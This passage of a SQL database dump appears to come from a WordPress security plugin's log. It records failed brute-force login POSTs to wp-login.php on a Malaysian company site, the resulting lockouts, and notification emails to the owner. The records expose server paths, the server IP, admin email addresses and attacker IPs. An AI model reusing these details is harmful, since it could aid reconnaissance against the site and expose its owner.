\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYC@7fBTP0kPOVnb8jpjgAAAFQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063676.0019\";s:12:\"REQUEST_TIME\";s:10:\"1569063676\";}}','notice','2019-09-21 11:01:17','2019-09-21 11:01:16',17799000,19288712,'https://bintara.com.my/2019/wp-login.php',1,0,'212.224.118.117'),(25417,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:00:20','2019-09-21 11:00:18',18092680,19287888,'https://bintara.com.my/wp/wp-login.php',1,0,'51.75.160.132'),(25418,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYC2XkXpgmG5P@iB8kQKgAAAJI\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"185.112.33.202\";s:11:\"REMOTE_PORT\";s:5:\"33330\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYC2XkXpgmG5P@iB8kQKgAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063642.1625\";s:12:\"REQUEST_TIME\";s:10:\"1569063642\";}}','notice','2019-09-21 11:00:43','2019-09-21 11:00:42',17802360,19288496,'https://bintara.com.my/blog/wp-login.php',1,0,'185.112.33.202'),(25419,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:00:42\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:00:42\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:15:42\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:15:42\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:00:43','2019-09-21 11:00:42',17887080,19288496,'https://bintara.com.my/blog/wp-login.php',1,0,'185.112.33.202'),(25420,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:00:43','2019-09-21 11:00:42',18092800,19288496,'https://bintara.com.my/blog/wp-login.php',1,0,'185.112.33.202'),(25421,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYC6LfBTP0kPOVnb8jpiwAAAEY\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"47.106.247.125\";s:11:\"REMOTE_PORT\";s:5:\"35500\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYC6LfBTP0kPOVnb8jpiwAAAEY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063656.3154\";s:12:\"REQUEST_TIME\";s:10:\"1569063656\";}}','notice','2019-09-21 11:00:57','2019-09-21 11:00:56',17799440,19289416,'https://bintara.com.my/test/wp-login.php',1,0,'47.106.247.125'),(25422,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:00:56\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:00:56\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:15:56\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:15:56\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:00:57','2019-09-21 11:00:56',17884176,19289416,'https://bintara.com.my/test/wp-login.php',1,0,'47.106.247.125'),(25423,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:00:57','2019-09-21 11:00:56',18090136,19289416,'https://bintara.com.my/test/wp-login.php',1,0,'47.106.247.125'),(25424,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYC6HkXpgmG5P@iB8kQPQAAAIU\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"118.238.4.201\";s:11:\"REMOTE_PORT\";s:5:\"62740\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYC6HkXpgmG5P@iB8kQPQAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063656.8594\";s:12:\"REQUEST_TIME\";s:10:\"1569063656\";}}','notice','2019-09-21 11:00:58','2019-09-21 11:00:57',17802808,19288416,'https://bintara.com.my/wordpress/wp-login.php',1,0,'118.238.4.201'),(25425,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:00:57\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:00:57\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:15:57\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:15:57\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:00:58','2019-09-21 11:00:57',17887376,19288416,'https://bintara.com.my/wordpress/wp-login.php',1,0,'118.238.4.201'),(25426,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:00:58','2019-09-21 11:00:57',18093064,19288416,'https://bintara.com.my/wordpress/wp-login.php',1,0,'118.238.4.201'),(25427,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYC9liJ7D9Gn7wDPh8V@QAAAMc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"37.247.54.2\";s:11:\"REMOTE_PORT\";s:5:\"57633\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYC9liJ7D9Gn7wDPh8V@QAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063670.7112\";s:12:\"REQUEST_TIME\";s:10:\"1569063670\";}}','notice','2019-09-21 11:01:11','2019-09-21 11:01:11',17799288,19290512,'https://bintara.com.my/2019/wp-login.php',1,0,'37.247.54.2'),(25416,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:00:18\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:00:18\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:15:18\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:15:18\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:00:19','2019-09-21 11:00:18',17886904,19287888,'https://bintara.com.my/wp/wp-login.php',1,0,'51.75.160.132'),(25413,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:59:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:59:23\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:14:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:14:23\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:59:24','2019-09-21 10:59:23',17886392,19288480,'https://bintara.com.my/2019/wp-login.php',1,0,'167.71.137.253'),(25414,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:59:24','2019-09-21 10:59:23',18092080,19288480,'https://bintara.com.my/2019/wp-login.php',1,0,'167.71.137.253'),(25415,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYCwliJ7D9Gn7wDPh8V6wAAAMs\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.75.160.132\";s:11:\"REMOTE_PORT\";s:5:\"50262\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYCwliJ7D9Gn7wDPh8V6wAAAMs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569063618.429\";s:12:\"REQUEST_TIME\";s:10:\"1569063618\";}}','notice','2019-09-21 11:00:19','2019-09-21 11:00:18',17802512,19287888,'https://bintara.com.my/wp/wp-login.php',1,0,'51.75.160.132'),(25411,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:59:03','2019-09-21 10:59:02',18092224,19288376,'https://bintara.com.my/test/wp-login.php',1,0,'89.221.219.30'),(25412,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 